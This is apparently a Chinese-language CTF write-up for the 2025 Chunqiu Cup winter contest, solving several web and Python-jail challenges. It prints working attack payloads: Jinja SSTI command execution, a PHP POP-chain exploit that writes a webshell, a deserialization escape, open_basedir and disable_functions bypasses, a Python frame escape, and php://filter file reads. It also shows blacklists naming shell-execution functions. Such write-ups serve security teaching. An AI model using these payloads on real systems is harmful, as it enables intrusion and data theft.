春秋杯2025冬季

easy_flask

有ssti注入,直接打

{{config.__class__.__init__.__globals__['os'].popen('tac f???').read()}}

file_copy

上来给了个提示说是copy文件.然而不知道copy哪去了,只能看到文件多大.
触发报错的时候看到了这样的提示

这个copy估计不是php里原生的函数,而是自己定义的(参数个数不对).联想到了php filter chain侧信道攻击.

python3 filters_chain_oracle_exploit.py --target http://eci-2zeaxdw9t0n5rr6drkk1.cloudeci1.ichunqiu.com/ --file /flag --parameter path

打不通的话多打几遍即可.

easy_ser

<?php
//error_reporting(0);
function PassWAF1($data){
    $BlackList = array("eval", "system", "popen", "exec", "assert", "phpinfo", "shell_exec",  "pcntl_exec", "passthru", "popen", "putenv");
    foreach ($BlackList as $value) {
        if (preg_match("/" . $value . "/im", $data)) {
            return true;
        }
    }
    return false;
}

function PassWAF2($str){
    $output = '';
    $count = 0;
    foreach (str_split($str, 16) as $v) {
        $hex_string = implode(' ', str_split(bin2hex($v), 4));
        $ascii_string = '';
        foreach (str_split($v) as $c) {
            $ascii_string .= (($c < ' ' || $c > '~') ? '.' : $c);
        }
        $output .= sprintf("%08x: %-40s %-16s\n", $count, $hex_string, $ascii_string);
        $count += 16;
    }
    return $output;
}

function PassWAF3($data){
    $BlackList = array("\.\.", "\/");
    foreach ($BlackList as $value) {
        if (preg_match("/" . $value . "/im", $data)) {
            return true;
        }
    }
    return false;
}

function Base64Decode($s){
    $decodeStr = base64_decode($s);
    if (is_bool($decodeStr)) {
        echo "gg";
        exit(-1);
    }
    return $decodeStr;
}

class STU{

    public $stu;
    public function __construct($stu){
        $this->stu = $stu;
    }

    public function __invoke(){
        echo $this->stu;
    }
}


class SDU{
    public $Dazhuan;

    public function __wakeup(){
        $Dazhuan = $this->Dazhuan;
        $Dazhuan();
    }
}


class CTF{
    public $hackman;
    public $filename;

    public function __toString(){

        $data = Base64Decode($this->hackman);
        $filename = $this->filename;

        if (PassWAF1($data)) {
            echo "so dirty";
            return;
        }
        if (PassWAF3($filename)) {
            echo "just so so?";
            return;
        }

        file_put_contents($filename, PassWAF2($data));
        echo "hack?";
        return "really!";
    }

    public function __destruct(){
        echo "bye";
    }
}

$give = $_POST['data'];
if (isset($_POST['data'])) {
    unserialize($give);
} else {
    echo "<center>听说pop挺好玩的</center>";
    highlight_file(__FILE__);
}

比较恶心人的就是这个waf2,他会对我们传上去的文件内容进行修改.最开始试图构建超短一句话木马去弹shell

<?=`$_GET[1]`?>

这个长度是刚好的,然而传上去也不知道是不解析短标签还是不出网,反正没反应.最后写出了个exp

<?php
//error_reporting(0);
function PassWAF1($data){
    $BlackList = array("eval", "system", "popen", "exec", "assert", "phpinfo", "shell_exec",  "pcntl_exec", "passthru", "popen", "putenv");
    foreach ($BlackList as $value) {
        if (preg_match("/" . $value . "/im", $data)) {
            return true;
        }
    }
    return false;
}

function PassWAF2($str){
    $output = '';
    $count = 0;
    foreach (str_split($str, 16) as $v) {
        $hex_string = implode(' ', str_split(bin2hex($v), 4));
        $ascii_string = '';
        foreach (str_split($v) as $c) {
            $ascii_string .= (($c < ' ' || $c > '~') ? '.' : $c);
        }
        $output .= sprintf("%08x: %-40s %-16s\n", $count, $hex_string, $ascii_string);
        $count += 16;
    }
    return $output;
}

function PassWAF3($data){
    $BlackList = array("\.\.", "\/");
    foreach ($BlackList as $value) {
        if (preg_match("/" . $value . "/im", $data)) {
            return true;
        }
    }
    return false;
}

function Base64Decode($s){
    $decodeStr = base64_decode($s);
    if (is_bool($decodeStr)) {
        echo "gg";
        exit(-1);
    }
    return $decodeStr;
}

class STU{

    public $stu;

}


class SDU{
    public $Dazhuan;

}


class CTF{
    public $hackman;
    public $filename;

}

$a = new SDU();
$a->Dazhuan = new STU();
$a->Dazhuan->stu = new CTF();
$a->Dazhuan->stu->hackman = base64_encode('<?php echo `    |$_GET[1]`;?>');
$a->Dazhuan->stu->filename = "shell.php";
echo serialize($a);

这个shell传上去的效果是这样的

在执行命令中使用|直接压制住了前面那堆屎.

Pyjail

赛后闲的没事看了眼pyjail这题,属于是考的2024国赛相同知识点.

import base64
from random import randint

with open("flag", "r") as f:
    flag = f.read()

BOX = [randint(1, 9999) for _ in range(624)]
print("Give me your solve:")
user_input = input().strip()

try:
    user_code = base64.b64decode(user_input).decode()
except Exception:
    print("Invalid base64 input")
    exit(1)

assert len(user_code) <= 121, "Input exceeds maximum allowed length"

exec_globals = {"__builtins__": None}
exec_locals = {}

try:
    exec(user_code, exec_globals, exec_locals)
except Exception:
    print("Error")
    exit(1)

s = exec_locals.get("s", None)
if s == BOX:
    print(flag)
else:
    print("Incorrect")

一眼栈帧逃逸,贴一下官方的exp吧

import base64

"""
def b():
    def a():yield g.gi_frame.f_back.f_back.f_back.f_back
    g=a();g=[x for x in g][0];return g.f_globals['BOX']
s=b()
"""

m = "def b():\n def a():yield g.gi_frame.f_back.f_back.f_back.f_back\n g=a();g=[x for x in g][0];return g.f_globals['BOX']\ns=b()"
p = base64.b64encode(m.encode())
print(p)
print(len(m))

b0okshelf

没做出来,照着官方的wp复现的.环境存下来了.
直接看漏洞的位置

<?php
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    require_once 'data.php';
    $book = new Book();
    $book->id = uniqid();
    $book->title = $_POST['title'];
    $book->author = $_POST['author'];
    $book->summary = $_POST['summary'];
    $book->reader = new Reader('books/' . $book->id . '.txt');
    file_put_contents('books/' . $book->id . '.txt', '读书使人进步!');
    file_put_contents('books/' . $book->id . '.info', waf(serialize($book)));
    header('Location: index.php');
    exit();
}

function waf($data)
{
    return str_replace("'", "\\'", $data);
}

include_once 'common/header.php';
?>

在waf的时候发生了反序列化增多逃逸,因此可以通过构造出现任意写文件.

O:4:"Book":5:{s:2:"id";s:13:"678bbfb094793";s:5:"title";s:6:"common";s:6:"author";s:3:"lbz";s:7:"summary";s:10:"helloworld";s:6:"reader";O:6:"Reader":1:{s:16:"%00Reader%00location";s:23:"books/678bbfb094793.txt";}}

例如上面这个反序列化,我们可以通过控制helloworld的值来覆盖后面的部分.
成功写入shell,发现存在open_basedir限制以及disable_functions.使用下面的payload绕过目录限制.

mkdir('sub');chdir('sub');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');var_dump(scandir('/'));

然后用cnext打一手iconv去绕过disable_functions,蚁剑插件不好使.成功拿shell.
最后使用sudo date去提权,成功拿到flag.

easy_php

有原题 [SWPUCTF 2018]SimplePHP,而且出题的眼神比较差,黑名单防错人了,直接在file.php处去读flag就行.

easy_code

上来robots.txt泄露出路由gogogo.php

<?php
header('Content-Type: text/html; charset=utf-8');
highlight_file(__FILE__);

$allowedFiles = ['read.php', 'index.php'];

$ctfer = $_GET['ctfer'] ?? null;


if ($ctfer === null) {
    die("error 0!");
}


if (!is_numeric($ctfer)) {
    die("error 1!");
}


if ($ctfer!= 667) {
    die("error 2!");
}

//溢出
if (strpos(strval($ctfer), '7')!== false) {
    die("error 3!");
}
//检查$ctfer的字符串中有没有7

$file = $_GET["file"];

if ($_COOKIE['pass'] == "admin") {
    if (isset($file)) {
        // 改进的正则表达式，检查是否不存在 base|rot13|input|data|flag|file|base64 字符串
        if (preg_match("/^(?:.*(?:base|rot13|input|data|flag|file|2|5|base64|log|proc|self|env).*)$/i", $file)) {
            // 先检查文件是否在允许的列表中
            echo "prohibited prohibited!!!!";
        } else {
            echo "试试read.php";
            include($file);
        }
    }
}
?>

第一处使用若比较去绕过,666.9999999999999999999999;第二处使用filter过滤器去读文件file=php://filter/convert.iconv.SJIS*.UCS-4*/resource=read.php直接读read.php就是flag.